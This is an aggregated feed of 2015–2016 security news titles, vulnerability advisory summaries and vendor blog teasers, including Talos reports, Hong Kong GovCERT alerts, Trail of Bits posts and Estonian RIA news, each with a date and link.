https://talosintelligence.com/vulnerability_reports/TALOS-2016-0059
Libgraphite Bidirectional Font BracketPairStack Code Execution Vulnerability
2016-02-05T00:00:00Z | 1454630400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0057
Libgraphite directrun Opcode Handling Code Execution Vulnerability
2016-02-05T00:00:00Z | 1454630400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0058
Libgraphite LocaLookup Denial of Service Vulnerability
2016-02-05T00:00:00Z | 1454630400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0061
Libgraphite Bidirectional Font mFeatureMap Denial of Service Vulnerability
2016-02-05T00:00:00Z | 1454630400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0060
Join us at Etsy’s Code as Craft
2016-02-04T12:50:24Z | 1454590224

We’re excited to announce that Sophia D’Antoine will be the next featured speaker at Etsy’s Code as Craft series on Wednesday, February 10th from 6:30-8pm in NYC. What is Code as Craft? Etsy Code as Craft events are a semi-monthly series of guest speakers who explore a technical topic or computing trend, sharing both conceptual […]

https://blog.trailofbits.com/2016/02/04/join-us-at-code-as-craft/
Software Security Ideas Ahead of Their Time
2016-02-02T12:50:18Z | 1454417418

Every good security researcher has a well-curated list of blogs they subscribe to. At Trail of Bits, given our interest in software security and its intersections with programming languages, one of our favorites is The Programming Language Enthusiast by Michael Hicks. Our primary activity is to describe and discuss research about — and the practical […]

https://blog.trailofbits.com/2016/02/02/software-security-ideas-ahead-of-their-time/
Security Alert (A16-01-09): Multiple Vulnerabilities in OpenSSL
2016-01-29T04:00:00Z | 1454040000

Multiple vulnerabilities are found in the OpenSSL library which may generate unsafe primes for use in the Diffie-Hellman protocol that may lead to disclosure of enough information for an attacker to recover the private encryption key. Moreover, a malicious client could negotiate SSLv2 ciphers that have been disabled on the server.

https://www.govcert.gov.hk/en/alerts_detail.php
Matroska libebml EbmlUnicodeString Heap Information Leak
2016-01-28T00:00:00Z | 1453939200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0036
Matroska Media Container libmatroska Multiple ElementList Double Free Vulnerabilities
2016-01-28T00:00:00Z | 1453939200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0037
Eesti läheb üle tugevamale krüptograafiale
2016-01-27T22:00:00Z | 1453932000

1. veebruaril avalikustatakse uus versioon ID-kaardi tarkvarast, millest on kaotatud nõrgenenud räsialgoritmil SHA-1 tuginevate digitaalallkirjade andmise võimalus.

https://ria.ee/uudised/eesti-laheb-ule-tugevamale-kruptograafiale
Security Alert (A16-01-08): Multiple Vulnerabilities in Firefox
2016-01-27T04:00:00Z | 1453867200

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox. These vulnerabilities are caused by memory safety bugs in the browser engine, memory corruption or buffer/integer overflow. A remote attacker could entice a user to open a web page with specially crafted content, malicious zip file or MP4 video file to exploit the vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-01-07): Vulnerability in Linux Kernel
2016-01-21T04:00:00Z | 1453348800

A local privilege escalation vulnerability is found in the Linux kernel 3.8 or later. A memory leak flaw exists in the Linux keyrings facility that manages key security data, authentication details and encryption keys could be exploited to expose cached sensitive information. A local attacker could obtain root privilege by running a specially crafted application locally. Proof-of-concept exploit codes are publicly available to demonstrate how to gain escalated root privilege.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-01-05): Multiple Vulnerabilities in ISC BIND
2016-01-20T04:00:00Z | 1453262400

Multiple vulnerabilities are found in the ISC BIND software. A remote attacker could send a specially crafted query to trigger a REQUIRE assertion failure which may cause the BIND to crash. In addition, a flaw in buffer size checking could cause the BIND to exit with an INSIST failure. Both authoritative and recursive name servers are vulnerable to these problems.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-01-06): Multiple Vulnerabilities in Oracle Java and Oracle Products (January 2016)
2016-01-20T04:00:00Z | 1453262400

Oracle has released Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products. There are 8 vulnerabilities identified in Java affecting multiple sub-components including 2D, AWT, JAXP, JMX, Libraries, Networking and Security. 7 of them could be remotely exploited without authentication and 4 of them could affect server deployment of Java (e.g. through a web service). For vulnerabilities identified in those Oracle products, they can be remotely exploited through various protocols including HTTP, HTTPS, JMS, MySQL Protocol, NFS, Oracle GoldenGate, Oracle Net, RPC, SMB, SSL/TLS, T3 and WebSocket over a network. There are multiple attack vectors. For Java, an attacker could entice a user to open a specially crafted web page containing un-trusted Java applet or Java Web Start application with malicious content, or to launch executables using the Java launcher. For other Oracle products, a remote attacker could send specially crafted network packets to the affected system to exploit the vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Network Time Protocol ntpq Control Protocol Replay Vulnerability
2016-01-19T00:00:00Z | 1453161600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0079
Network Time Protocol ntpq Buffer Overflow Vulnerability
2016-01-19T00:00:00Z | 1453161600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0072
Network Time Protocol Private Mode 'reslist' NULL Pointer Dereference Vulnerability
2016-01-19T00:00:00Z | 1453161600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0074
Network Time Protocol Authenticated Preemptable Modes Denial-of-Service Vulnerability
2016-01-19T00:00:00Z | 1453161600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0076
Network Time Protocol Skeleton Key: Symmetric Authentication Impersonation Vulnerability
2016-01-19T00:00:00Z | 1453161600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0071
Network Time Protocol Private Mode 'reslist' Stack Memory Exhaustion Vulnerability
2016-01-19T00:00:00Z | 1453161600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0075
Network Time Protocol ntpq and ntpdc Infinite Loop Vulnerability
2016-01-19T00:00:00Z | 1453161600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0080
Network Time Protocol ntpq Special Character Filtering Vulnerability
2016-01-19T00:00:00Z | 1453161600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0073
Network Time Protocol Deja Vu: Broadcast Mode Replay Vulnerability
2016-01-19T00:00:00Z | 1453161600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0070
Network Time Protocol Origin Timestamp Check Impersonation Vulnerability
2016-01-19T00:00:00Z | 1453161600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0077
Network Time Protocol ntpq and ntpdc Origin Timestamp Disclosure Vulnerability
2016-01-19T00:00:00Z | 1453161600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0078
Security Alert (A16-01-04): Multiple Vulnerabilities in OpenSSH
2016-01-15T04:00:00Z | 1452830400

Multiple vulnerabilities are found in OpenSSH. A remote authenticated server could obtain potentially sensitive information from OpenSSH client memory or potentially execute arbitrary code on the target client system. An OpenSSH client connecting to a malicious OpenSSH server may have its private client user keys compromised or arbitrary codes executed.

https://www.govcert.gov.hk/en/alerts_detail.php
Hacking for Charity: Automated Bug-finding in LibOTR
2016-01-13T12:50:25Z | 1452689425

At the end of last year, we had some free time to explore new and interesting uses of the automated bug-finding technology we developed for the DARPA Cyber Grand Challenge. While the rest of the competitors are quietly preparing for the CGC Final Event, we can entertain you with tales of running our bug-finding tools […]

https://blog.trailofbits.com/2016/01/13/hacking-for-charity-automated-bug-finding-in-libotr/
Security Alert (A16-01-02): Multiple Vulnerabilities in Microsoft Products (January 2016)
2016-01-13T04:00:00Z | 1452657600

Microsoft has released 9 security bulletins addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-01-03): Multiple Vulnerabilities in Adobe Acrobat and Reader
2016-01-13T04:00:00Z | 1452657600

Security updates are released for Adobe Acrobat and Reader to address multiple vulnerabilities caused by use-after-free error, double-free error, memory corruption, problems in Javascript API and directory search path problem in Adobe Download Manager.

https://www.govcert.gov.hk/en/alerts_detail.php
Riiklikust tarkvarast kaob DDOC-vorming
2016-01-10T22:00:00Z | 1452463200

Alates käesoleva aasta veebruarist saab ID-kaardi tarkvaras anda vaid .bdoc ja .asice vormingus digiallkirju, kaob .ddoci loomise võimalus.

https://ria.ee/uudised/riiklikust-tarkvarast-kaob-ddoc-vorming
Why Deception Matters in Cybersecurity
2016-01-10T15:26:16Z | 1452439576

Deception has a centuries-old successful history in military warfare. Military doctrine from Sun Tzu, Genghis Khan, and Machiavelli, all the way through the Second World War has stressed the importance of deceiving the enemy to know their plans and thwart their objectives.

https://www.smokescreen.io/why-deception-matters/
Security Alert (A16-01-01): Multiple Vulnerabilities in Apple QuickTime
2016-01-08T04:00:00Z | 1452225600

Multiple vulnerabilities are found in Apple QuickTime. A remote attacker could exploit the vulnerabilities by enticing a user to open a specially crafted movie file.

https://www.govcert.gov.hk/en/alerts_detail.php
Apple Quicktime Invalid samr Atom Size Denial of Service Vulnerability
2016-01-08T00:00:00Z | 1452211200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0019
Apple Quicktime dref Atom Null Data Reference Entry Denial of Service Vulnerability
2016-01-08T00:00:00Z | 1452211200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0023
Apple Quicktime mdat Corruption Denial of Service Vulnerability
2016-01-08T00:00:00Z | 1452211200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0020
Apple Quicktime Invalid alis Atom Size Denial of Service Vulnerability
2016-01-08T00:00:00Z | 1452211200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0022
Apple Quicktime mdat Corruption Denial of Service Vulnerability
2016-01-08T00:00:00Z | 1452211200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0021
2015 In Review
2016-01-07T12:50:18Z | 1452171018

Now that the new year is upon us, we can look back and take assessment of 2015. The past year saw Trail of Bits continuing our prior work, such as automated vulnerability discovery and remediation, and branching out into new areas, like secure self-hosted video chat. We also increased our community outreach: we advocated against […]

https://blog.trailofbits.com/2016/01/07/2015-in-review/
RTMPDump librtmp AMF3 MemberName Denial of Service Vulnerability
2016-01-07T00:00:00Z | 1452124800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0066
RTMPDump rtmpsrv PlayPath Null Pointer Dereference
2016-01-07T00:00:00Z | 1452124800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0068
RTMPDump librtmp AMF3 Class Member Count Remote Code Execution Vulnerability
2016-01-07T00:00:00Z | 1452124800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0067
Eesti.ee aktiveeris teavitusteenuse kõigile ametliku e-posti suunanutele
2016-01-05T22:00:00Z | 1452031200

Sellest aastast aktiveeris riigiportaal kõigil ametliku e-posti suunanud kasutajatel teenuse Minu Dokumendid ning selle teavituse.

https://ria.ee/uudised/eestiee-aktiveeris-teavitusteenuse-koigile-ametliku-e-posti-suunanutele
Let’s Encrypt the Internet
2016-01-05T12:50:59Z | 1451998259

We’re excited to announce our financial support for Let’s Encrypt, the open, automated and free SSL Certificate Authority (CA) that went into public beta on December 3. With so much room for improvement in the CA space, Let’s Encrypt offers a refreshing, promising vision of encrypting the web. Expensive SSL certificates are holding back Internet […]

https://blog.trailofbits.com/2016/01/05/lets-encrypt-the-internet/
Cloud Services are Eating the World
2016-01-05T10:01:21Z | 1451988081

The Cloud revolution is impacting the technology sector. You can clearly see it in the business results of companies like HP and IBM. For sure, legacy technology providers are embracing the Cloud. They are transforming their businesses from building and running on-premise infrastructures to delivering Cloud-based services. The harsh reality is that this is a... The post Cloud Services are Eating the World appeared first on Cato Networks.

https://www.catonetworks.com/blog/cloud-services-are-eating-the-world/
The final report of the 2015 Best Practices Forum on CSIRT has been published
2015-12-21T15:34:00Z | 1450712040

The final report of the 2015 Best Practices Forum on CSIRT, organized within the Internet Governance Forum, has been published

https://www.first.org/newsroom/releases/20151221
Self-Hosted Video Chat with Tuber
2015-12-15T13:00:24Z | 1450184424

Today, we’re releasing the source code to our self-hosted video chat platform, Tuber Time Communications (or just “Tuber”). We’ve been using Tuber for private video calls with up to 15 members of our team over the last year or two. We want you to use it, protect your privacy, and help us make it better. […]

https://blog.trailofbits.com/2015/12/15/self-hosted-video-chat-with-tuber/
Whistling in the Dark: how secure is your midsize enterprise business?
2015-12-14T09:59:48Z | 1450087188

It is high noon. The one (and only) security analyst for a midsize business, needs to prepare for a PCI compliance audit. Meanwhile, a phishing email baits an account payable clerk at a regional office to access a malicious site and his workstation is infected with a financial Trojan. At closing that day, $500,000 from... The post Whistling in the Dark: how secure is your midsize enterprise business? appeared first on Cato Networks.

https://www.catonetworks.com/blog/whistling-in-the-dark-how-secure-is-your-midsize-enterprise-business/
Microsoft .NET Manifest Resource Information Disclosure Vulnerability
2015-12-08T00:00:00Z | 1449532800

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0129
How to stop attacks – 5 ways Top CSOs do it
2015-11-18T13:16:28Z | 1447852588

Leading companies are changing their approach to cybersecurity. Here’s how – (1) Focusing on detection and response, (2) Making security alerts actionable, (3) Increasing internal network visibility, (4) Removing the human element in monitoring, and (5) Catching attacks early with threat intelligence.

https://www.smokescreen.io/5-ways-the-most-successful-csos-stop-attacks/
Dell SonicWall TotalSecure TZ 100 Series CVE-2015-7770 Denial of Service Vulnerability
2015-11-06T11:59:00Z | 1446811140

Dell SonicWall TotalSecure TZ 100 devices with firmware before 5.9.1.0-22o allow remote attackers to cause a denial of service via a crafted packet. CVE: CVE-2015-7770 Last updated: Dec. 7, 2016, 6:25 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2015-0005
RIA pälvis aasta hankija tiitli
2015-11-04T22:00:00Z | 1446674400

Riigi Infosüsteemi Amet pälvis aasta hankija tiitli teenuste kategoorias. Aasta hankija konkurss kuulutati välja kolmes kategoorias: teenused, asjad ning ehitustööd.

https://ria.ee/uudised/ria-palvis-aasta-hankija-tiitli
Eesti loob eeldused riikidevaheliseks andmevahetuseks
2015-11-01T22:00:00Z | 1446415200

Riigi Infosüsteemi Amet käivitab täna uue põlvkonna X-tee keskserveri, mis võimaldab korraldada turvalist andmevahetust Eesti ja teiste X-teega sarnast süsteemi kasutavate riikide andmekogude vahel.

https://ria.ee/uudised/eesti-loob-eeldused-riikidevaheliseks-andmevahetuseks
Why we give so much to CSAW
2015-10-30T11:50:52Z | 1446205852

In just a couple of weeks, tens of thousands of students and professionals from all over the world will tune in to cheer on their favorite teams in six competitions. If you’ve been following our blog for some time, you’ll know just what we’re referring to: Cyber Security Awareness Week (CSAW), the nation’s largest student-run […]

https://blog.trailofbits.com/2015/10/30/why-we-give-so-much-to-csaw/
Network Time Protocol Reference Clock Memory Corruption Vulnerability
2015-10-21T00:00:00Z | 1445385600

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0064
Network Time Protocol ntpd saveconfig Directory Traversal Vulnerability
2015-10-21T00:00:00Z | 1445385600

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0062
NAK to the Future: NTP Symmetric Association Authentication Bypass Vulnerability
2015-10-21T00:00:00Z | 1445385600

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0069
Network Time Protocol Trusted Keys Memory Corruption Vulnerability
2015-10-21T00:00:00Z | 1445385600

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0054
Network Time Protocol ntpq atoascii Memory Corruption Vulnerability
2015-10-21T00:00:00Z | 1445385600

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0063
Network Time Protocol Remote Configuration Denial of Service Vulnerability
2015-10-21T00:00:00Z | 1445385600

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0055
Network Time Protocol ntpd multiple integer overflow read access violations
2015-10-21T00:00:00Z | 1445385600

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0052
Network Time Protocol Password Length Memory Corruption Vulnerability
2015-10-21T00:00:00Z | 1445385600

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0065
Complexity is the Real Vulnerability
2015-10-11T09:58:40Z | 1444557520

Security is a unique IT discipline. It overlays and supports all other disciplines: compute, networks, storage, apps, data. As IT evolves so does IT security, often with a considerable lag. The introduction of personal computing gave rise to endpoint protection suites and AV capabilities. Networks drove the introduction of the firewall. Applications spawned multiple security... The post Complexity is the Real Vulnerability appeared first on Cato Networks.

https://www.catonetworks.com/blog/complexity-is-the-real-vulnerability/
RIA valmistab ette ID-kaardi tarkvara kauguuenduse võimalust
2015-09-30T21:00:00Z | 1443646800

Riigi Infosüsteemi Amet (RIA) valmistab koostöös tarkvaratootjatega ette ID-kaardil olevate sertifikaatide ja tarkvara kauguuenduse võimalust.

https://ria.ee/uudised/ria-valmistab-ette-id-kaardi-tarkvara-kauguuenduse-voimalust
Algab suurim kodumaine küberjulgeolekuõppus
2015-09-19T21:00:00Z | 1442696400

Homme algab Tallinnas õppus KüberSiil 2015, mille käigus imiteeritakse ulatuslike küberintsidentide lahendamist. Riigi Infosüsteemi Amet on õppusele kaasanud üle kahekümne partneri Eesti riigiasutuste ja elutähtsaid teenuseid osutavate ettevõtete seast.

https://ria.ee/uudised/algab-suurim-kodumaine-kuberjulgeolekuoppus
Microsoft Windows CDD Font Parsing Kernel Memory Corruption
2015-09-15T00:00:00Z | 1442275200

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0007
MiniUPnP Internet Gateway Device Protocol XML Parser Buffer Overflow
2015-09-15T00:00:00Z | 1442275200

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0035
Malware Detection is a Failing Strategy
2015-09-10T15:23:21Z | 1441898601

Bypassing anti-malware systems is so trivial that attackers don’t treat it as a major obstacle. Even newbie pen-testers know how to go from off-the-shelf malware to “fully undetectable”. Attackers have it automated. Stop solving the symptoms, and start solving the problem.

https://www.smokescreen.io/malware-detection-is-a-failing-strategy/
Summer @ Trail of Bits
2015-09-10T11:50:45Z | 1441885845

This summer I’ve had the incredible opportunity to work with Trail of Bits as a high school intern. In return, I am obligated to write a blog post about this internship. So without further ado, here it is. Starting with Fuzzing The summer kicked off with fuzzing, a technique I had heard of but had […]

https://blog.trailofbits.com/2015/09/10/summer-trail-of-bits/
Flare-On Reversing Challenges 2015
2015-09-09T11:50:00Z | 1441799400

This summer FireEye’s FLARE team hosted its second annual Flare-On Challenge targeting reverse engineers, malware analysts, and security professionals. In total, there were eleven challenges, each using different anti-reversing techniques and each in different formats. For example, challenges ranged from simple password crack-mes to kernel drivers to stego in images. This blogpost will highlight four […]

https://blog.trailofbits.com/2015/09/09/flare-on-reversing-challenges-2015/
Lipstick on a Pig?: Hybrid WAN, SD-WAN and the Death of MPLS
2015-09-01T09:56:52Z | 1441101412

Networking is an enterprise IT discipline where being conservative is often the way to go. After all, without the network, today’s technology-powered businesses are dead in the water. The network doesn’t have to be totally down, though, to disrupt the business. Slow or unpredictable application response time can cripple point of sale, customer service, manufacturing... The post Lipstick on a Pig?: Hybrid WAN, SD-WAN and the Death of MPLS appeared first on Cato Networks.

https://www.catonetworks.com/blog/lipstick-on-a-pig-hybrid-wan-sd-wan-and-the-death-of-mpls/
Dell SonicWall NetExtender CVE-2015-4173 Remote Privilege Escalation Vulnerability
2015-08-26T19:59:00Z | 1440619140

Unquoted Windows search path vulnerability in the autorun value in Dell SonicWall NetExtender before 7.5.227 and 8.0.x before 8.0.238, as used in the SRA firmware before 7.5.1.2-40sv and 8.x before 8.0.0.3-23sv, allows local users to gain privileges via a Trojan horse program in the %SYSTEMDRIVE% folder. CVE: CVE-2015-4173 Last updated: March 12, 2018, 5:29 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2015-0004
Peterkop: „Meie regioonile on iseloomulikud poliitiliselt motiveeritud küberrünnakud“
2015-08-20T21:00:00Z | 1440104400

Täna külastas Riigi Infosüsteemi Ametit Eestis visiidil olev USA Kongressi delegatsioon eesotsas senaator John McCainiga. Kõne all olid Eesti ja USA koostöösuhted ning Eesti julgeolekukeskkonda mõjutavad küberohud.

https://ria.ee/uudised/peterkop-meie-regioonile-iseloomulikud-poliitiliselt-motiveeritud-kuberrunnakud
Better Keep It Open or Closed?
2015-08-16T09:53:55Z | 1439718835

Here is a nice debate we can have until the cows come home. The battle for security supremacy has been raging for years between “open” and “closed” approaches for software development. Can we name a winner? First, lets define the terminology. A software-based ecosystem has 3 main characteristics: how the software is developed, maintained and... The post Better Keep It Open or Closed? appeared first on Cato Networks.

https://www.catonetworks.com/blog/better-keep-it-open-or-closed/
Apple Quicktime esds Atom Descriptor Type Length Mismatch Denial of Service Vulnerability
2015-08-13T00:00:00Z | 1439424000

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0015
Apple Quicktime mdat Corruption Denial of Service Vulnerability
2015-08-13T00:00:00Z | 1439424000

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0017
Apple Quicktime Invalid URL Atom Size Denial of Service Vulnerability
2015-08-13T00:00:00Z | 1439424000

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0012
Apple Quicktime Invalid mvhd Atom Size Denial of Service Vulnerability
2015-08-13T00:00:00Z | 1439424000

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0014
Apple Quicktime Invalid 3GPP stsd Sample Description Entry Size Denial of Service Vulnerability
2015-08-13T00:00:00Z | 1439424000

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0013
Where Do I Plug It? the dissolving perimeter and the insertion dillema
2015-07-29T09:50:01Z | 1438163401

Not every topic in networking and security is “sexy”. We all want to discuss the business value of our solutions, but we are often less keen to discuss deployment technicalities (this is mostly true for marketing folks like me). However, because the enterprise IT environment is undergoing a major transformation driven by Cloud and mobility,... The post Where Do I Plug It? the dissolving perimeter and the insertion dillema appeared first on Cato Networks.

https://www.catonetworks.com/blog/where-do-i-plug-it-the-dissolving-perimeter-and-the-insertion-dillema/
The Horrors of Ransomware and the Mid-market Enterprise
2015-07-22T09:35:32Z | 1437557732

Mid-market enterprises do not generate big headlines as far as data breaches go. After all, why would a nation state or an organized cybercrime group take the time and effort to target an organization with a limited customer base and few commercially-valuable assets? They can’t really use them for cyber warfare or monetize in the... The post The Horrors of Ransomware and the Mid-market Enterprise appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-horrors-of-ransomware-and-the-mid-market-enterprise/
Hardware Side Channels in the Cloud
2015-07-21T11:50:01Z | 1437479401

At REcon 2015, I demonstrated a new hardware side channel which targets co-located virtual machines in the cloud. This attack exploits the CPU’s pipeline as opposed to cache tiers which are often used in side channel attacks. When designing or looking for hardware based side channels – specifically in the cloud – I analyzed a […]

https://blog.trailofbits.com/2015/07/21/hardware-side-channels-in-the-cloud/
Data Center Ransomware
2015-07-20T11:20:00Z | 1437391200

https://www.akamai.com/blog/security/data-center-ransomware
Apple Quicktime tkhd Atom Matrix Corruption Denial of Service Vulnerability
2015-07-20T00:00:00Z | 1437350400

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0016
Total Commander FileInfo Plugin Multiple Denial of Service Vulnerabilities
2015-07-16T00:00:00Z | 1437004800

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0024
How We Fared in the Cyber Grand Challenge
2015-07-15T11:00:09Z | 1436958009

The Cyber Grand Challenge qualifying event was held on June 3rd, at exactly noon Eastern time. At that instant, our Cyber Reasoning System (CRS) was given 131 purposely built insecure programs. During the following 24 hour period, our CRS was able to identify vulnerabilities in 65 of those programs and rewrite 94 of them to […]

https://blog.trailofbits.com/2015/07/15/how-we-fared-in-the-cyber-grand-challenge/
User Experience as a Service or a Tale of Three Giants
2015-07-15T09:33:17Z | 1436952797

The late 70s were the glory days of Apple. The Apple II had set the standard for a new personal computing era. Not for long. With the emergence of Microsoft’s MS-DOS 1.0 and the IBM PC, two diametrically opposed product design and go-to-market strategies collided. Microsoft’s strategy was to build “The Alliance”. It had partnered... The post User Experience as a Service or a Tale of Three Giants appeared first on Cato Networks.

https://www.catonetworks.com/blog/user-experience-as-a-service-or-a-tale-of-three-giants-2/
Drowning In Data – The Event Fatigue Problem
2015-07-10T22:17:39Z | 1436566659

‘Event fatigue’ is a real concern. It’s not even surprising to seasoned security professionals to find that the alerts from monitoring systems are ignored, or even worse – disabled, often in the name of ‘tuning’ the system. Here’s a better approach.

https://www.smokescreen.io/drowning-in-data-the-event-fatigue-problem/
The Software Revolution’s Next Stop: The Enterprise Network
2015-07-08T09:23:07Z | 1436347387

We are living through a software revolution. The flexible and agile nature of software makes it easier to conceive, build, test and deploy new products. It is also easier to iterate through revisions, continuously incorporating market feedback and adapting to changing requirements. By its nature, hardware is less agile and adaptive which slows down the... The post The Software Revolution’s Next Stop: The Enterprise Network appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-software-revolutions-next-stop-the-enterprise-network/
How to Harden Your Google Apps
2015-07-07T18:52:12Z | 1436295132

Never let a good incident go to waste. Today, we’re using the OPM incident as an excuse to share with you our top recommendations for shoring up the security of your Google Apps for Work account. More than 5 million companies rely on Google Apps to run their critical business functions, like email, document storage, calendaring, and […]

https://blog.trailofbits.com/2015/07/07/how-to-harden-your-google-apps/
Apple Quicktime Corrupt stbl Atom Remote Code Execution Vulnerability
2015-06-30T00:00:00Z | 1435622400

https://talosintelligence.com/vulnerability_reports/TALOS-2015-0018
Simplicity, Courtesy of the Cloud
2015-06-24T09:06:38Z | 1435136798

Simplicity is the holy grail of the technology products of our time. “Can’t it just work?” is the prayer of end users everywhere. Simplicity is also at the epicenter of the Cloud revolution. The days of complex and risky enterprise software implementations are now fading from our memories. Pioneered in the area of business applications,... The post Simplicity, Courtesy of the Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/simplicity-courtesy-of-the-cloud/
The Appliance Straightjacket
2015-06-18T09:02:06Z | 1434618126

Let’s admit it: we want to love our appliances. Not the washing machines and the dryers, but the technology workhorses that dominate the IT landscape. They are cool to look at with their modern industrial designs, bright colors, and cool branding. They are even more attractive inside a rack stacked up with their brethren: lights... The post The Appliance Straightjacket appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-appliance-straightjacket/
Unified Security – Improving the Future
2015-06-18T03:00:00Z | 1434596400

800 IT security experts gather at international FIRST Conference in the German capital

https://www.first.org/newsroom/releases/20150618
FIRST announces availability of new Common Vulnerability Scoring System (CVSS) release
2015-06-10T18:00:00Z | 1433959200

Third version aims to make the system more applicable to modern concerns

https://www.first.org/newsroom/releases/20150610
IT-lahendustesse tuleb ehitada võimalus asendada krüptograafilised algoritmid tugevamatega
2015-06-09T21:00:00Z | 1433883600

Riigi Infosüsteemi Ameti tellitud krüptograafiliste algoritmide elutsükli uuring soovitab luua IT-lahendustesse arhitektuurselt võimalus asendada aja möödudes neis kasutatavad krüptograafilised algoritmid uute ja tugevamatega.

https://ria.ee/uudised/it-lahendustesse-tuleb-ehitada-voimalus-asendada-kruptograafilised-algoritmid-tugevamatega
Introducing the RubySec Field Guide
2015-06-08T11:50:54Z | 1433764254

Vulnerabilities have been discovered in Ruby applications with the potential to affect vast swathes of the Internet and attract attackers to lucrative targets online. These vulnerabilities take advantage of features and common idioms such as serialization and deserialization of data in the YAML format. Nearly all large, tested and trusted open-source Ruby projects contain some of […]

https://blog.trailofbits.com/2015/06/08/introducing-the-rubysec-field-guide/
Eesti parim e-teenus 2015 on e-residendiks taotlemise keskkond
2015-06-03T21:00:00Z | 1433365200

Täna õhtupoolikul valis ekspertidest koosnev žürii Eesti 2015. aasta parimaks e-teenuseks e-residentidele digitaalse ID taotlemise keskkonna, mis juba teenuse käivitamise avanädalal tõstis Eesti e-residentsust taotlevate inimeste hulka mitukümmend korda.

https://ria.ee/uudised/eesti-parim-e-teenus-2015-e-residendiks-taotlemise-keskkond
FIRST and OAS sign memorandum to jointly organize activities to support incident response in OAS member states
2015-06-01T20:13:00Z | 1433189580

The Organization of American States (OAS) and the Forum of Incident Response and Security Teams (FIRST) signed an agreement to cooperate in the promotion of a cyber security culture and measures to improve responses to cyber incidents.

http://www.oas.org/en/media_center/press_release.asp
FIRST and 4SICS join forces on improving Industrial Control Systems Security
2015-05-28T22:14:00Z | 1432851240

FIRST, the Forum of Incident Response and Security Teams, has paired up with 4SICS, the premium summit in Northern Europe for security in SCADA, SMARTGRID, and INDUSTRIAL CONTROL SYSTEMS. The second annual international summit takes place in October 2015 (20-22) in Stockholm, Sweden, with a series of high-level presentations and tutorials delivered by international experts in the field of cyber security in SCADA and Industrial Control Systems.

https://4sics.se/first-and-4sics-join-forces-on-improving-industrial-control-systems-security/
FIRST sponsored a TRANSITS training in Tunisia May 25-27, 2015
2015-05-27T13:30:00Z | 1432733400

The event was hosted by AfricaCERT and team rep Jean-Robert Hountomey and was also supported by GEANT Association (TRANSITS II Training) and Don Stikvoort.

https://www.first.org/newsroom/releases/20150527
RIA soovitab kõigil kasutada Gmailis kaheastmelist autentimist
2015-05-26T21:00:00Z | 1432674000

Riigi Infosüsteemi Amet soovitab konto ülevõtmise vältimiseks kasutada Gmaili postkasti logimisel kahetasemelist autentimist. Soovituse andmise põhjus on üha kasvav kontode ülevõtmine ja nende edasine kasutamine petukirjade saatmiseks.

https://ria.ee/uudised/ria-soovitab-koigil-kasutada-gmailis-kaheastmelist-autentimist
Multiple Dell SonicWALL Products CVE-2015-3990 Remote Code Execution Vulnerability
2015-05-20T18:59:00Z | 1432148340

The GMS ViewPoint (GMSVP) web application in Dell Sonicwall GMS, Analyzer, and UMA EM5000 before 7.2 SP4 allows remote authenticated users to execute arbitrary commands via vectors related to configuration. CVE: CVE-2015-3990 Last updated: March 13, 2018, 8:25 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2015-0003
Closing the Windows Gap
2015-05-13T21:26:29Z | 1431552389

The security research community is full of grey beards that earned their stripes writing exploits against mail servers, domain controllers, and TCP/IP stacks. These researchers started writing exploits on platforms like Solaris, IRIX, and BSDi before moving on to Windows exploitation. Now they run companies, write policy, rant on twitter, and testify in front of […]

